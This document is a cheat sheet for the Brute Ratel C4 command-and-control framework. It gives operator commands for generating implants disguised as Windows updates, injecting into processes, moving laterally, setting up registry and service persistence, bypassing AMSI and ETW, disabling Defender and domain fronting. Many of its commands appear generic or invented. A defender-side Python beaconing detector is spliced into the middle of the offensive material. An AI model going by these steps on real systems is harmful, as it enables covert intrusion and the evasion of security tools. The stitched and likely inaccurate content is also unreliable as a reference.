# Brute Ratel C4 Framework Cheat Sheet
## Overview

Brute Ratel C4 (BRc4) is a customized commercial Command and Control (C2) framework designed for red team operations and adversary simulation. It provides advanced evasion capabilities, sophisticated post-exploitation functionality and professional-grade operational security.

⚠️ Warning: This is a commercial tool that requires a valid license. It is intended solely for authorized penetration testing and red team exercises. Make sure you have authorization before using it in any environment.
## Installation

### License Activation

```bash
# Activate license (requires valid license key)
./brc4 --activate <license-key>

# Verify license status
./brc4 --license-info

# Update license
./brc4 --update-license
```
### Server Setup

```bash
# Start BRc4 server
./brc4 --server

# Start with custom configuration
./brc4 --server --config /path/to/config.json

# Start with specific interface
./brc4 --server --interface 0.0.0.0 --port 443
```
### Client Connection

```bash
# Connect to server
./brc4 --client --server 192.168.1.100:443

# Connect with authentication
./brc4 --client --server 192.168.1.100:443 --auth-token <token>
```
## Command Reference

### Server Management

| Command | Description |
|---|---|
| help | Display help menu |
| version | Show version information |
| listeners | List active listeners |
| badgers | List connected badgers (agents) |
| operators | List connected operators |
| exit | Exit the BRc4 server |
### Listener Management

| Command | Description |
|---|---|
| listener http | Create HTTP listener |
| listener https | Create HTTPS listener |
| listener dns | Create DNS listener |
| listener tcp | Create TCP listener |
| listener smb | Create SMB listener |
| listener stop <id> | Stop listener |
### Badger (Agent) Management

| Command | Description |
|---|---|
| badger <id> | Interact with badger |
| badger kill <id> | Kill badger |
| badger sleep <time> | Set sleep interval |
| badger jitter <percentage> | Set jitter percentage |
| badger proxy <proxy> | Set proxy for badger |
## Listener Configuration

### HTTP/HTTPS Listeners

```bash
# Create HTTPS listener
listener https
set host 0.0.0.0
set port 443
set cert /path/to/cert.pem
set key /path/to/key.pem
set malleable /path/to/profile.profile
start

# Create HTTP listener with domain fronting
listener http
set host 0.0.0.0
set port 80
set front-domain cdn.example.com
set host-header legitimate-site.com
start
```
### DNS Listener

```bash
# Create DNS listener
listener dns
set domain example.com
set nameserver ns1.example.com
set port 53
start
```
### SMB Listener

### TCP Listener
## Badger Generation

### Windows Badger

```bash
# Generate Windows executable
generate windows exe
set listener https-443
set arch x64
set format exe
set output windows_badger.exe
generate

# Generate Windows DLL
generate windows dll
set listener https-443
set arch x64
set format dll
set output windows_badger.dll
generate

# Generate Windows service
generate windows service
set listener https-443
set arch x64
set service-name "WindowsUpdate"
set output windows_service.exe
generate
```
### Linux Badger

```bash
# Generate Linux ELF
generate linux elf
set listener https-443
set arch x64
set format elf
set output linux_badger
generate

# Generate Linux shared library
generate linux so
set listener https-443
set arch x64
set format so
set output linux_badger.so
generate
```
### macOS Badger

```bash
# Generate macOS binary
generate macos macho
set listener https-443
set arch x64
set format macho
set output macos_badger
generate

# Generate macOS application
generate macos app
set listener https-443
set arch x64
set app-name "Updater"
set output macos_app.app
generate
```
## Post-Exploitation Commands

### System Information

```bash
# Get system information
sysinfo

# Get current user
whoami

# Get privileges
getprivs

# Get environment variables
env

# Get network interfaces
ifconfig
```
### File Operations

```bash
# List directory
ls /path/to/directory

# Change directory
cd /path/to/directory

# Download file
download /remote/path/file.txt

# Upload file
upload /local/path/file.txt /remote/path/

# Execute file
execute /path/to/executable

# Delete file
rm /path/to/file
```
### Process Management

```bash
# List processes
ps

# Kill process
kill <pid>

# Migrate to process
migrate <pid>

# Inject into process
inject <pid> <payload>

# Create process
spawn <executable>
```
### Network Operations

```bash
# Network connections
netstat

# ARP table
arp

# Routing table
route

# Port scan
portscan 192.168.1.0/24 80,443,3389

# Ping sweep
ping 192.168.1.0/24
```
## Advanced Features

### Malleable C2 Profiles

```bash
# Load malleable profile
set malleable /path/to/profile.profile
```

```
# Custom HTTP profile
http-get {
    set uri "/api/v1/status";
    client {
        header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
        header "Accept" "application/json";
    }
    server {
        header "Content-Type" "application/json";
        output {
            print;
        }
    }
}
```
### Process Injection Techniques

```bash
# Classic DLL injection
inject-dll

# Process hollowing
hollow

# Reflective DLL loading
reflective-dll /path/to/dll.dll

# Manual DLL mapping
map-dll

# Thread hijacking
hijack-thread
```
### Lateral Movement

```bash
# WMI execution
wmi-exec 192.168.1.10 "whoami"

# PSExec
psexec 192.168.1.10 "whoami"

# SMB execution
smb-exec 192.168.1.10 "whoami"

# DCOM execution
dcom-exec 192.168.1.10 "whoami"

# WinRM execution
winrm-exec 192.168.1.10 "whoami"
```
### Persistence Mechanisms

```bash
# Registry persistence
persist-registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "Update" "C:\temp\badger.exe"

# Scheduled task
persist-task "WindowsUpdate" "C:\temp\badger.exe" daily

# Service persistence
persist-service "UpdateService" "C:\temp\badger.exe"

# WMI persistence
persist-wmi "ProcessStart" "C:\temp\badger.exe"

# Startup folder
persist-startup "C:\temp\badger.exe"
```
## Evasion Techniques

### Anti-Analysis

```bash
# VM detection
vm-detect

# Sandbox evasion
sandbox-evasion

# Debugger detection
debugger-detect

# Sleep evasion
sleep-evasion 300

# User interaction check
user-interaction
```
### AMSI/ETW Bypass

```bash
# AMSI bypass
amsi-bypass

# ETW bypass
etw-bypass

# Disable Windows Defender
disable-defender

# Unhook DLLs
unhook-dlls

# Patch AMSI
patch-amsi
```
### Traffic Obfuscation

```bash
# Domain fronting
set front-domain cdn.cloudflare.com
set host-header legitimate-site.com

# Custom User-Agent
set user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

# Custom headers
set headers "X-Forwarded-For: 192.168.1.100"

# Proxy chains
set proxy-chain "http://proxy1:8080,socks5://proxy2:1080"
```
### Payload Obfuscation

```bash
# Encrypt payload
encrypt-payload aes256 <key>

# Obfuscate strings
obfuscate-strings

# Pack executable
pack-exe upx

# Sign executable
sign-exe /path/to/cert.pfx

# Polymorphic generation
polymorphic-gen
```
## Operational Security

### Communication Security

```bash
# Use encrypted channels
set encryption aes256

# Certificate pinning
set cert-pinning true

# Custom TLS configuration
set tls-version 1.3
set cipher-suite ECDHE-RSA-AES256-GCM-SHA384

# Jitter configuration
set jitter 20
set jitter-type random
```
### Infrastructure Management

```bash
# Redirector setup
set redirector nginx
set upstream-server 192.168.1.100:443

# Load balancing
set load-balancer round-robin
set backend-servers "192.168.1.100,192.168.1.101"

# Failover configuration
set failover-servers "backup1.com,backup2.com"
```
### Logging and Monitoring

```bash
# Enable detailed logging
set log-level debug
set log-file /var/log/brc4.log

# Operator tracking
set operator-logging true

# Command auditing
set command-audit true

# Session recording
set session-recording true
```
## Team Operations

### Multi-Operator Support

```bash
# Add operator
operator add username password

# Set operator permissions
operator permissions username read,write,execute

# Operator sessions
operator sessions

# Kick operator
operator kick username
```
### Collaboration Features

```bash
# Share badger session
share-session <badger-id> <operator>

# Session notes
note-add "Important finding"
note-list
note-delete <note-id>

# Team chat
chat "Message to team"
chat-history
```
## Troubleshooting

### Connection Issues

```bash
# Test listener
test-listener <listener-id>

# Check connectivity
test-connectivity <target>

# Verify certificates
verify-cert /path/to/cert.pem

# Debug mode
set debug true
```
### Badger Issues

```bash
# Badger health check
health-check <badger-id>

# Reset badger
reset-badger <badger-id>

# Badger diagnostics
diagnostics <badger-id>

# Force reconnect
reconnect <badger-id>
```
### Performance Optimization

```bash
# Optimize sleep intervals
set sleep-optimization true

# Bandwidth throttling
set bandwidth-limit 1024

# Connection pooling
set connection-pooling true

# Compression
set compression gzip
```
## Configuration

### Server Configuration

```json
{
  "server": {
    "host": "0.0.0.0",
    "port": 443,
    "ssl": true,
    "cert": "/path/to/cert.pem",
    "key": "/path/to/key.pem"
  },
  "database": {
    "type": "sqlite",
    "path": "/opt/brc4/database.db"
  },
  "logging": {
    "level": "info",
    "file": "/var/log/brc4.log"
  }
}
```
### Malleable Profile

```
# Custom malleable profile
set sample_name "Custom Profile";
set sleeptime "30000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";

http-get {
    set uri "/api/status";
    client {
        header "Accept" "application/json";
        header "Accept-Language" "en-US,en;q=0.9";
    }
    server {
        header "Content-Type" "application/json";
        output {
            print;
        }
    }
}
```
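From the defender's side, a profile like this one (and the one in the Malleable C2 Profiles section) fixes the URI, User-Agent, sleep time and jitter of the beacon traffic, which is exactly what a proxy-log hunt can key on. The following is an added example, not BRc4 code or part of this cheat sheet: it parses the flat subset of the profile syntax shown above and flags clients in constructed proxy log lines whose matching requests arrive at intervals inside the sleeptime ± jitter window. The profile text, log format and IP addresses are all constructed for the example.

```python
import re
from datetime import datetime

# Constructed profile text in the simplified syntax shown above (not a real BRc4 profile)
PROFILE = '''set sleeptime "30000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
http-get {
    set uri "/api/status";
    client {
        header "Accept" "application/json";
        header "Accept-Language" "en-US,en;q=0.9";
    }
}'''

# Constructed proxy log lines: timestamp, client IP, method, URI, quoted User-Agent
LOGS = [
    '2024-05-01T10:00:00Z 10.0.0.5 GET /api/status "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '2024-05-01T10:00:31Z 10.0.0.5 GET /api/status "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '2024-05-01T10:00:58Z 10.0.0.5 GET /api/status "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '2024-05-01T10:01:30Z 10.0.0.5 GET /api/status "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '2024-05-01T10:00:05Z 10.0.0.9 GET /api/status "curl/8.0"',
    '2024-05-01T10:00:07Z 10.0.0.9 GET /api/status "curl/8.0"',
]

def parse_profile(text):
    """Return sleep (seconds), jitter (fraction), User-Agent, URI and client headers.
    Handles only the flat 'set ...;' / 'client { header ...; }' subset used in this cheat sheet."""
    sets = dict(re.findall(r'set\s+(\w+)\s+"([^"]*)";', text))
    client = re.search(r'client\s*\{(.*?)\}', text, re.S)
    headers = dict(re.findall(r'header\s+"([^"]*)"\s+"([^"]*)";', client.group(1))) if client else {}
    return {"sleep_s": int(sets["sleeptime"]) / 1000, "jitter": int(sets["jitter"]) / 100,
            "useragent": sets["useragent"], "uri": sets["uri"], "client_headers": headers}

def find_beaconing_clients(profile, log_lines):
    """Group hits on the profile's URI + User-Agent by client IP, then flag clients
    whose every inter-request gap falls within sleeptime * (1 - jitter) .. sleeptime * (1 + jitter)."""
    lo = profile["sleep_s"] * (1 - profile["jitter"])
    hi = profile["sleep_s"] * (1 + profile["jitter"])
    by_client = {}
    for line in log_lines:
        ts, ip, _method, uri, ua = re.match(r'(\S+) (\S+) (\S+) (\S+) "([^"]*)"', line).groups()
        if uri == profile["uri"] and ua == profile["useragent"]:
            by_client.setdefault(ip, []).append(datetime.fromisoformat(ts.replace("Z", "+00:00")))
    flagged = []
    for ip, times in by_client.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if gaps and all(lo <= g <= hi for g in gaps):  # a single hit has no gaps and is not flagged
            flagged.append(ip)
    return flagged
```

With a 30 s sleep and 20% jitter the accepted window is 24 to 36 s, so 10.0.0.5 (gaps of 31, 27 and 32 s) is flagged while 10.0.0.9 is not, because its User-Agent does not match the profile.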
## Resources

This cheat sheet provides a complete reference for using Brute Ratel C4. It is a commercial tool that requires an appropriate license. Always make sure you have authorization before using this tool in any environment.